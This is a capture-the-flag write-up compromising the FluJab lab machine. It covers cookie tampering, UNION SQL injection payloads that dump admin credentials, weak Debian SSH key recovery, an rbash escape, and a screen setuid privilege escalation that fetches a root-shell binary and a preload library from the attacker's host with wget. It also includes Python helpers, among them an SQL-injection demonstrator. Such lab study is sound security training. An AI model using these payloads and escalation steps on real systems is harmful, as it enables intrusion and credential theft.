Basic information

Port scan

Nothing unusual beyond the web ports (22 answers but nmap cannot fingerprint it), but the HTTPS certificate lists a lot of domains:

$ nmap -sC -sV 10.10.10.124

Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-27 14:51 CST
Nmap scan report for 10.10.10.124
Host is up (0.068s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh?
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp open http nginx
|_http-server-header: ClownWare Proxy
|_http-title: Did not follow redirect to https://10.10.10.124/
443/tcp open ssl/https ClownWare Proxy
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 301 Moved Permanently
| Date: Thu, 27 May 2021 06:51:58 GMT
| Content-Type: text/html
| Content-Length: 178
| Connection: close
| Location: https://clownware.htb/cwerror_pages.php
| Server: ClownWare Proxy
| <html>
| <head><title>301 Moved Permanently</title></head>
| <body bgcolor="white">
| <center><h1>301 Moved Permanently</h1></center>
| <hr><center>nginx</center>
| </body>
| </html>
| GetRequest:
| HTTP/1.1 200 OK
| Date: Thu, 27 May 2021 06:51:57 GMT
| Content-Type: text/html; charset=UTF-8
| Connection: close
| Server: ClownWare Proxy
| <!DOCTYPE html>
| <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
| <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
| <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
| <!--[if gt IE 8]><!-->
| <html class="js" style="opacity: 1; visibility: visible;" lang="en-US"><!--<![endif]--><head>
| <title>Direct IP access not allowed | ClownWare</title>
| <meta charset="UTF-8">
| <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
| <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
| <meta name="robots" content="noindex, nofollow">
| <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1">
| <link rel="stylesheet" id="cf_styles-css" href="index_files
| HTTPOptions:
| HTTP/1.1 405 Not Allowed
| Date: Thu, 27 May 2021 06:51:58 GMT
| Content-Type: text/html
| Content-Length: 166
| Connection: close
| Server: ClownWare Proxy
| <html>
| <head><title>405 Not Allowed</title></head>
| <body bgcolor="white">
| <center><h1>405 Not Allowed</h1></center>
| <hr><center>nginx</center>
| </body>
|_ </html>
|_http-server-header: ClownWare Proxy
|_http-title: Direct IP access not allowed | ClownWare
| ssl-cert: Subject: commonName=ClownWare.htb/organizationName=ClownWare Ltd/stateOrProvinceName=LON/countryName=UK
| Subject Alternative Name: DNS:clownware.htb, DNS:sni147831.clownware.htb, DNS:*.clownware.htb, DNS:proxy.clownware.htb, DNS:console.flujab.htb, DNS:sys.flujab.htb, DNS:smtp.flujab.htb, DNS:vaccine4flu.htb, DNS:bestmedsupply.htb, DNS:custoomercare.megabank.htb, DNS:flowerzrus.htb, DNS:chocolateriver.htb, DNS:meetspinz.htb, DNS:rubberlove.htb, DNS:freeflujab.htb, DNS:flujab.htb
| Not valid before: 2018-11-28T14:57:03
|_Not valid after: 2023-11-27T14:57:03
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
| tls-nextprotoneg:
|_ http/1.1
8080/tcp open ssl/http nginx
|_http-server-header: ClownWare Proxy
|_http-title: Direct IP access not allowed | ClownWare
| ssl-cert: Subject: commonName=ClownWare.htb/organizationName=ClownWare Ltd/stateOrProvinceName=LON/countryName=UK
| Subject Alternative Name: DNS:clownware.htb, DNS:sni147831.clownware.htb, DNS:*.clownware.htb, DNS:proxy.clownware.htb, DNS:console.flujab.htb, DNS:sys.flujab.htb, DNS:smtp.flujab.htb, DNS:vaccine4flu.htb, DNS:bestmedsupply.htb, DNS:custoomercare.megabank.htb, DNS:flowerzrus.htb, DNS:chocolateriver.htb, DNS:meetspinz.htb, DNS:rubberlove.htb, DNS:freeflujab.htb, DNS:flujab.htb
| Not valid before: 2018-11-28T14:57:03
|_Not valid after: 2023-11-27T14:57:03
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
| tls-nextprotoneg:
|_ http/1.1
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port443-TCP:V=7.91%T=SSL%I=7%D=5/27%Time=60AF418D%P=x86_64-apple-darwin
SF:19.6.0%r(GetRequest,E1E,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Thu,\x2027\
SF:x20May\x202021\x2006:51:57\x20GMT\r\nContent-Type:\x20text/html;\x20cha
SF:rset=UTF-8\r\nConnection:\x20close\r\nServer:\x20ClownWare\x20Proxy\r\n
SF:\r\n<!DOCTYPE\x20html>\n<!--\[if\x20lt\x20IE\x207\]>\x20<html\x20class=
SF:\"no-js\x20ie6\x20oldie\"\x20lang=\"en-US\">\x20<!\[endif\]-->\n<!--\[i
SF:f\x20IE\x207\]>\x20\x20\x20\x20<html\x20class=\"no-js\x20ie7\x20oldie\"
SF:\x20lang=\"en-US\">\x20<!\[endif\]-->\n<!--\[if\x20IE\x208\]>\x20\x20\x
SF:20\x20<html\x20class=\"no-js\x20ie8\x20oldie\"\x20lang=\"en-US\">\x20<!
SF:\[endif\]-->\n<!--\[if\x20gt\x20IE\x208\]><!-->\n<html\x20class=\"js\"\
SF:x20style=\"opacity:\x201;\x20visibility:\x20visible;\"\x20lang=\"en-US\
SF:"><!--<!\[endif\]--><head>\n<title>Direct\x20IP\x20access\x20not\x20all
SF:owed\x20\|\x20ClownWare</title>\n<meta\x20charset=\"UTF-8\">\n<meta\x20
SF:http-equiv=\"Content-Type\"\x20content=\"text/html;\x20charset=UTF-8\">
SF:\n<meta\x20http-equiv=\"X-UA-Compatible\"\x20content=\"IE=Edge,chrome=1
SF:\">\n<meta\x20name=\"robots\"\x20content=\"noindex,\x20nofollow\">\n<me
SF:ta\x20name=\"viewport\"\x20content=\"width=device-width,initial-scale=1
SF:,maximum-scale=1\">\n<link\x20rel=\"stylesheet\"\x20id=\"cf_styles-css\
SF:"\x20href=\"index_files")%r(HTTPOptions,141,"HTTP/1\.1\x20405\x20Not\x2
SF:0Allowed\r\nDate:\x20Thu,\x2027\x20May\x202021\x2006:51:58\x20GMT\r\nCo
SF:ntent-Type:\x20text/html\r\nContent-Length:\x20166\r\nConnection:\x20cl
SF:ose\r\nServer:\x20ClownWare\x20Proxy\r\n\r\n<html>\r\n<head><title>405\
SF:x20Not\x20Allowed</title></head>\r\n<body\x20bgcolor=\"white\">\r\n<cen
SF:ter><h1>405\x20Not\x20Allowed</h1></center>\r\n<hr><center>nginx</cente
SF:r>\r\n</body>\r\n</html>\r\n")%r(FourOhFourRequest,186,"HTTP/1\.1\x2030
SF:1\x20Moved\x20Permanently\r\nDate:\x20Thu,\x2027\x20May\x202021\x2006:5
SF:1:58\x20GMT\r\nContent-Type:\x20text/html\r\nContent-Length:\x20178\r\n
SF:Connection:\x20close\r\nLocation:\x20https://clownware\.htb/cwerror_pag
SF:es\.php\r\nServer:\x20ClownWare\x20Proxy\r\n\r\n<html>\r\n<head><title>
SF:301\x20Moved\x20Permanently</title></head>\r\n<body\x20bgcolor=\"white\
SF:">\r\n<center><h1>301\x20Moved\x20Permanently</h1></center>\r\n<hr><cen
SF:ter>nginx</center>\r\n</body>\r\n</html>\r\n");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 192.72 seconds

80/443

Browsing to port 80 redirects to 443, which serves the ClownWare proxy error page:

SSL information

Add every domain from the certificate to /etc/hosts:

echo | openssl s_client -showcerts -servername 10.10.10.124 -connect 10.10.10.124:443 2>/dev/null | openssl x509 -inform pem -noout -text | grep DNS | tr "," "\n" | cut -d: -f2

clownware.htb
sni147831.clownware.htb
*.clownware.htb
proxy.clownware.htb
console.flujab.htb
sys.flujab.htb
smtp.flujab.htb
vaccine4flu.htb
bestmedsupply.htb
custoomercare.megabank.htb
flowerzrus.htb
chocolateriver.htb
meetspinz.htb
rubberlove.htb
freeflujab.htb
flujab.htb
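The one-liner above prints the names but still leaves the /etc/hosts entries to be typed by hand, and it happily prints the wildcard entry, which /etc/hosts cannot express. The following script is an added example (not part of the original write-up) that turns `openssl x509 -text` output into hosts lines, drops wildcards and reports them separately for later subdomain enumeration. The embedded sample text is the SAN line copied from the scan above, wrapped in constructed surrounding lines; the IP 10.10.10.124 is the target from the page.

```python
import re
import sys
from typing import List

# Constructed sample: the SAN line as `openssl x509 -text` prints it for the
# ClownWare certificate (copied from the scan above), plus neighbouring lines.
SAMPLE_X509_TEXT = """\
            X509v3 Subject Alternative Name:
                DNS:clownware.htb, DNS:sni147831.clownware.htb, DNS:*.clownware.htb, DNS:proxy.clownware.htb, DNS:console.flujab.htb, DNS:sys.flujab.htb, DNS:smtp.flujab.htb, DNS:vaccine4flu.htb, DNS:bestmedsupply.htb, DNS:custoomercare.megabank.htb, DNS:flowerzrus.htb, DNS:chocolateriver.htb, DNS:meetspinz.htb, DNS:rubberlove.htb, DNS:freeflujab.htb, DNS:flujab.htb
            X509v3 Basic Constraints:
                CA:FALSE
"""

DNS_SAN = re.compile(r"DNS:([^,\s]+)")


def san_dns_names(x509_text: str) -> List[str]:
    """DNS SANs from `openssl x509 -text` output, in order, deduplicated."""
    seen, names = set(), []
    for name in DNS_SAN.findall(x509_text):
        if name not in seen:
            seen.add(name)
            names.append(name)
    return names


def wildcard_sans(x509_text: str) -> List[str]:
    """Wildcard entries: they cannot go in /etc/hosts, but they tell you the
    proxy will answer for any subdomain, so they are worth brute-forcing later."""
    return [n for n in san_dns_names(x509_text) if n.startswith("*.")]


def hosts_lines(x509_text: str, ip: str) -> List[str]:
    """One '/etc/hosts' line per concrete SAN, all pointing at the target IP."""
    return [f"{ip} {n}" for n in san_dns_names(x509_text) if not n.startswith("*.")]


if __name__ == "__main__":
    # usage: openssl s_client ... | openssl x509 -noout -text | python3 san_hosts.py 10.10.10.124
    ip = sys.argv[1] if len(sys.argv) > 1 else "10.10.10.124"
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_X509_TEXT
    for line in hosts_lines(text, ip):
        print(line)
    for wc in wildcard_sans(text):
        print(f"# wildcard not added to hosts: {wc}", file=sys.stderr)
```

Piping the output through `sudo tee -a /etc/hosts` appends all fifteen concrete names in one go; the wildcard goes to stderr so it never lands in the hosts file.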

Rabbit holes / entry points

Visit each vhost in turn and rule them out; the entry points turn out to be freeflujab.htb and smtp.flujab.htb:

freeflujab.htb

Visiting freeflujab.htb sets several cookies:

Patient is the MD5 of our IP; the other two are base64:

smtp_config

Modus appears to control access to the config page:

Requesting the path directly is denied, but after changing the cookie it can be reached:

echo -n Configure=True | base64
Q29uZmlndXJlPVRydWU=

The SMTP server can be configured; the format check is only client-side and easily bypassed, so point it at our own host:

sudo python -m smtpd -n -c DebuggingServer 10.10.14.5:25
# note: the smtpd module was removed from the standard library in Python 3.12

The config change is accepted, but something else still has to trigger a mail to be sent:
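Because `python -m smtpd` no longer exists on current Python, here is an added replacement (not from the original write-up): a minimal accept-everything SMTP sink written on asyncio. The protocol state machine is separated from the socket handling so it can be exercised offline; the hostname, the port 2525 (port 25 needs root, which is why the page uses sudo) and the sample session below are assumptions for the example.

```python
import asyncio
from typing import List, Optional


class SmtpSink:
    """Line-by-line SMTP state machine that accepts any sender and recipient
    and stores every message. feed() takes one client line (CRLF stripped) and
    returns the reply to send, or None while a DATA body is being received."""

    def __init__(self, hostname: str = "smtp-sink"):
        self.hostname = hostname
        self.messages: List[dict] = []           # {"sender", "recipients", "data"}
        self._sender: Optional[str] = None
        self._rcpts: List[str] = []
        self._body: Optional[List[str]] = None   # not None => inside DATA

    def greeting(self) -> str:
        return f"220 {self.hostname} ESMTP ready"

    def feed(self, line: str) -> Optional[str]:
        if self._body is not None:
            if line == ".":                      # end of DATA
                self.messages.append({
                    "sender": self._sender,
                    "recipients": list(self._rcpts),
                    "data": "\n".join(self._body),
                })
                self._sender, self._rcpts, self._body = None, [], None
                return "250 OK: queued"
            # RFC 5321 transparency: a leading ".." is an escaped single "."
            self._body.append(line[1:] if line.startswith("..") else line)
            return None
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            return f"250 {self.hostname}"
        if verb == "MAIL":                       # MAIL FROM:<addr>
            self._sender = arg.partition(":")[2].strip()
            return "250 OK"
        if verb == "RCPT":                       # RCPT TO:<addr>
            self._rcpts.append(arg.partition(":")[2].strip())
            return "250 OK"
        if verb == "DATA":
            if not self._rcpts:
                return "503 Bad sequence: RCPT TO first"
            self._body = []
            return "354 End data with <CR><LF>.<CR><LF>"
        if verb == "RSET":
            self._sender, self._rcpts = None, []
            return "250 OK"
        if verb == "NOOP":
            return "250 OK"
        if verb == "QUIT":
            return "221 Bye"
        return "500 Command not recognised"


async def _handle(reader: asyncio.StreamReader, writer: asyncio.StreamWriter) -> None:
    sink = SmtpSink()
    writer.write((sink.greeting() + "\r\n").encode())
    await writer.drain()
    while True:
        raw = await reader.readline()
        if not raw:
            break
        reply = sink.feed(raw.decode("utf-8", "replace").rstrip("\r\n"))
        if reply is None:
            continue
        writer.write((reply + "\r\n").encode())
        await writer.drain()
        if reply.startswith("250 OK: queued"):
            msg = sink.messages[-1]
            print(f"--- from {msg['sender']} to {msg['recipients']} ---")
            print(msg["data"])                   # the Subject line is what we read later
        if reply.startswith("221"):
            break
    writer.close()
    await writer.wait_closed()


async def serve(host: str = "0.0.0.0", port: int = 2525) -> None:
    """Listen for the target's outbound mail. 2525 runs unprivileged; for the
    page's setup use port 25 under sudo or enter 2525 in the smtp_config form."""
    server = await asyncio.start_server(_handle, host, port)
    async with server:
        await server.serve_forever()


if __name__ == "__main__":
    asyncio.run(serve())
```

Every received message is printed in full, so the `Ref:` value in the subject that the SQL injection section relies on shows up directly in the terminal.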

Registration

Changing the cookie in the same way to register fails:

echo -n a2ebd5abc8b9a8d2d57a510a9f24aad3=True | base64
YTJlYmQ1YWJjOGI5YThkMmQ1N2E1MTBhOWYyNGFhZDM9VHJ1ZQ==

remind

The reminder function sends an e-mail for a given ID, which should trigger the SMTP config we just changed, but it needs a valid ID:

Cancel

The cancel function does not check the ID; anything in the right format is accepted:

Note the mail subject: something should follow "Ref", and it is empty because the ID we supplied does not exist. The ID is evidently used in a query, so this is a candidate for SQL injection.

SQL injection

A few simple tests, judged from the SMTP log:

# five columns; only column 3 is reflected (after "Ref" in the subject)
nhsnum=NHS-012-345-6789'+UNION+SELECT+1,2,3,4,5;+--+-&submit=Cancel+Appointment
3

@@version
10.1.37-MariaDB-0+deb9u1

database()
vaccinations

'+UNION+select+1,2,TABLE_SCHEMA,4,5+FROM+INFORMATION_SCHEMA.COLUMNS;+--+-
MedStaff

# walk the result set one row at a time by changing the LIMIT offset
'+UNION+SELECT+1,2,TABLE_SCHEMA,4,5+FROM+INFORMATION_SCHEMA.COLUMNS+LIMIT+0,1;+--+-
information_schema

# all tables in MedStaff
'+UNION+SELECT+1,2,CONCAT(TABLE_SCHEMA,':',TABLE_NAME),4,5+FROM+INFORMATION_SCHEMA.COLUMNS+where+TABLE_SCHEMA='MedStaff'+LIMIT+0,1;+--+--

# finally the admin credentials
' UNION SELECT 1,2,concat(loginname,':',password,':',access),4,5 FROM admin#
sysadm:a3e30cce47580888f1f185798aca22ff10be617f4a982d67643bb56448508602:sysadmin-console-01.flujab.htb
plaintext: th3doct0r
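To make the mechanics of the injection above reproducible offline, here is an added example (not the box's real code): a constructed stand-in for the cancel handler that concatenates the NHS number into its query and reflects column 3 of the first row after "Ref: ", the same oracle the page reads out of the e-mail subject. It runs on sqlite instead of MariaDB, so `sqlite_master` stands in for `INFORMATION_SCHEMA`, `||` for `concat()` and `-- -` for `#`; the table and column names, the appointment row and the admin row are all made up. The parameterised handler beside it shows why the same payload then leaks nothing.

```python
import sqlite3
from typing import Callable, List

REF_MARK = "Ref: "


def build_db() -> sqlite3.Connection:
    """Constructed stand-in for the target's database (sqlite, not MariaDB).
    Names, the appointment and the admin row are invented for this example."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE appointments(id INTEGER, nhsnum TEXT, ref TEXT, slot TEXT, site TEXT);
        CREATE TABLE admin(loginname TEXT, password TEXT, access TEXT);
        INSERT INTO appointments VALUES (1, 'NHS-111-222-3333', 'REF-0001', '2021-06-01 09:00', 'clinic-a');
        INSERT INTO admin VALUES ('sysadm', 'constructed-hash', 'sysadmin-console-01.flujab.htb');
    """)
    return db


def cancel_subject_vulnerable(db: sqlite3.Connection, nhsnum: str) -> str:
    """The bug: the form value is concatenated into the query, and column 3 of
    the first row is echoed after 'Ref: ' in the cancellation mail subject.
    That single reflected column is the whole injection oracle."""
    sql = f"SELECT id, nhsnum, ref, slot, site FROM appointments WHERE nhsnum = '{nhsnum}'"
    row = db.execute(sql).fetchone()
    ref = "" if row is None or row[2] is None else str(row[2])
    return "Appointment cancelled " + REF_MARK + ref


def cancel_subject_fixed(db: sqlite3.Connection, nhsnum: str) -> str:
    """Same handler with a bound parameter: the payload is just a string that
    matches no appointment, so nothing attacker-chosen is reflected."""
    sql = "SELECT id, nhsnum, ref, slot, site FROM appointments WHERE nhsnum = ?"
    row = db.execute(sql, (nhsnum,)).fetchone()
    ref = "" if row is None or row[2] is None else str(row[2])
    return "Appointment cancelled " + REF_MARK + ref


Oracle = Callable[[sqlite3.Connection, str], str]


def leak(db: sqlite3.Connection, oracle: Oracle, expr: str, from_clause: str = "") -> str:
    """Send one 5-column UNION payload and return what came back after 'Ref: '."""
    payload = f"' UNION SELECT 1,2,{expr},4,5{from_clause}-- -"
    return oracle(db, payload).split(REF_MARK, 1)[1]


def dump_column(db: sqlite3.Connection, oracle: Oracle, inner_select: str,
                max_rows: int = 100) -> List[str]:
    """Walk a one-column query row by row with LIMIT n,1, the way the page does
    by hand, stopping at the first empty reflection (NULL from the subquery)."""
    rows: List[str] = []
    for n in range(max_rows):
        value = leak(db, oracle, f"({inner_select} LIMIT {n},1)")
        if value == "":
            break
        rows.append(value)
    return rows


if __name__ == "__main__":
    db = build_db()
    print("column probe :", leak(db, cancel_subject_vulnerable, "3"))
    print("version      :", leak(db, cancel_subject_vulnerable, "sqlite_version()"))
    print("tables       :", dump_column(db, cancel_subject_vulnerable,
          "SELECT name FROM sqlite_master WHERE type='table' ORDER BY name"))
    print("admin row    :", leak(db, cancel_subject_vulnerable,
          "loginname||':'||password||':'||access", " FROM admin"))
    print("fixed handler:", repr(leak(db, cancel_subject_fixed, "3")))
```

`dump_column` is the loop behind the page's "change the LIMIT offset" step: because only one row is reflected per request, every table, column and credential has to be pulled out one `LIMIT n,1` request at a time.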

sysadmin

Add the new domain to /etc/hosts as well and log in:

sysadmin-console-01.flujab.htb
sysadm : th3doct0r

This one is served on port 8080 (you may get a 403 because of the Origin header; a Burp match/replace rule that strips that header fixes it):

SSH keys

The console has a built-in notepad that can browse files, and it turns up some SSH public keys:

Debian-ssh

Searching on the details leads to CVE-2008-0166 (the Debian OpenSSL weak-PRNG keys): the private key can be recovered from the public key by looking it up in the pre-generated keysets, whose files are named after the MD5 of the raw key blob:

# md5 of the decoded key blob = file name prefix in the debian-ssh keysets
awk '{print $2}' 0223269.pub | base64 -d | md5sum

dead0b5b829ea2e3d22f47a7cbde17a6 -
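The awk pipeline works for one plain key line, but it silently gives the wrong digest on authorized_keys entries that carry options such as `from="..."` before the key type, and it has to be repeated per key. The following is an added example (not part of the original write-up) of the same lookup done robustly: compute the blob MD5 for every key in a file and match it against the `<md5>-<id>` file names of an unpacked keyset, as with the `dead0b5b829ea2e3d22f47a7cbde17a6-23269` file used above. The sample authorized_keys text is constructed and its blobs are not real keys; the keyset directory path is an assumption.

```python
import base64
import hashlib
import sys
from pathlib import Path
from typing import Dict, Iterable, Optional

# Constructed sample: NOT real keys (the blobs decode to "abc" and "def"); they
# only exercise the line shapes a parser meets in an authorized_keys file.
SAMPLE_AUTHORIZED_KEYS = """\
# keys for drno
ssh-rsa YWJj drno@flujab
from="10.10.10.0/24",no-pty ssh-rsa YWJj backup@flujab
ssh-ed25519 ZGVm ops@flujab
"""

KEY_TYPES = {"ssh-rsa", "ssh-dss", "ssh-ed25519",
             "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521"}


def blob_md5(pubkey_line: str) -> Optional[str]:
    """MD5 of the decoded key blob (what `awk '{print $2}' | base64 -d | md5sum`
    computes), or None for comments, blank lines and undecodable blobs.
    Options such as from="..." before the key type are skipped over."""
    fields = pubkey_line.split()
    for i, field in enumerate(fields[:-1]):
        if field in KEY_TYPES:
            try:
                blob = base64.b64decode(fields[i + 1], validate=True)
            except ValueError:              # binascii.Error is a ValueError
                return None
            return hashlib.md5(blob).hexdigest()
    return None


def weak_key_candidates(authorized_keys_text: str) -> Dict[str, str]:
    """blob-md5 -> key line, for every key in an authorized_keys file."""
    out: Dict[str, str] = {}
    for line in authorized_keys_text.splitlines():
        digest = blob_md5(line)
        if digest is not None:
            out.setdefault(digest, line.strip())
    return out


def match_keyset(hashes: Iterable[str], filenames: Iterable[str]) -> Dict[str, str]:
    """Resolve each md5 against the names in an unpacked keyset directory.
    Keys there are stored as <md5>-<id> (private) and <md5>-<id>.pub; the
    private file is what `ssh -i` needs, so .pub names are ignored."""
    wanted = set(hashes)
    hits: Dict[str, str] = {}
    for name in filenames:
        if name.endswith(".pub"):
            continue
        digest = name.partition("-")[0]
        if digest in wanted:
            hits[digest] = name
    return hits


if __name__ == "__main__":
    # usage: weakkeys.py authorized_keys /path/to/debian-ssh/rsa/4096   (paths assumed)
    text = Path(sys.argv[1]).read_text() if len(sys.argv) > 1 else SAMPLE_AUTHORIZED_KEYS
    names = (p.name for p in Path(sys.argv[2]).iterdir()) if len(sys.argv) > 2 else []
    cands = weak_key_candidates(text)
    hits = match_keyset(cands, names)
    for digest, line in cands.items():
        print(digest, "->", hits.get(digest, "(not in keyset)"), "|", line[:60])
```

A hit means the host's key was generated by the broken Debian OpenSSL and the matching private file logs in directly; a miss for every key rules this vector out before any connection attempt.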

SSH & user flag

The MD5 of the public key matches a private key in the rsa/4096 keyset, but connecting directly gets the connection reset:

dead0b5b829ea2e3d22f47a7cbde17a6

ssh -i dead0b5b829ea2e3d22f47a7cbde17a6-23269 drno@10.10.10.124
kex_exchange_identification: read: Connection reset by peer

ssh_wl

Edit the whitelist config file to allow our IP (gotcha: the file needs a trailing empty line):

user.txt

Now SSH works and we get user.txt:

rbash to bash

The login shell is rbash, so many commands are unavailable; switch to bash and fix PATH:

COMMAND='/bin/bash'
# make runs its recipe via /bin/sh, which is not restricted; '-' ignores the exit status
make -s --eval=$'x:\n\t-'"$COMMAND"
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

# or request bash at login time; PATH still has to be fixed
ssh -i dead0b5b829ea2e3d22f47a7cbde17a6-23269 drno@10.10.10.124 -t bash
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

Privilege escalation info

A SUID search finds two copies of screen:

drno@flujab:~$ find / -user root -perm /4000 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/local/share/screen/screen
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/screen
/usr/bin/gpasswd
/usr/bin/sudo
/bin/su
/bin/umount
/bin/mount
/bin/ping
/bin/fusermount

A search turns up:

Privesc & root flag

The box has no gcc, so compile the exploit locally and upload it, then run the steps one at a time to get a root shell and read root.txt (the 755 permission issue is worked around by using the absolute path):

cd /tmp   # the preload path below expects both files here
wget http://10.10.14.5:7777/rootshell
wget http://10.10.14.5:7777/libhax.so

chmod +x *

cd /etc
umask 000 # the log file screen creates must be readable by the loader
# screen opens its -L log file with root privileges (CVE-2017-5618, screen 4.5.0),
# so it can create /etc/ld.so.preload; the leading newline keeps the path on its own line
/usr/local/share/screen/screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
/usr/local/share/screen/screen -ls # screen itself is setuid, so it now loads libhax.so as root
/tmp/rootshell

References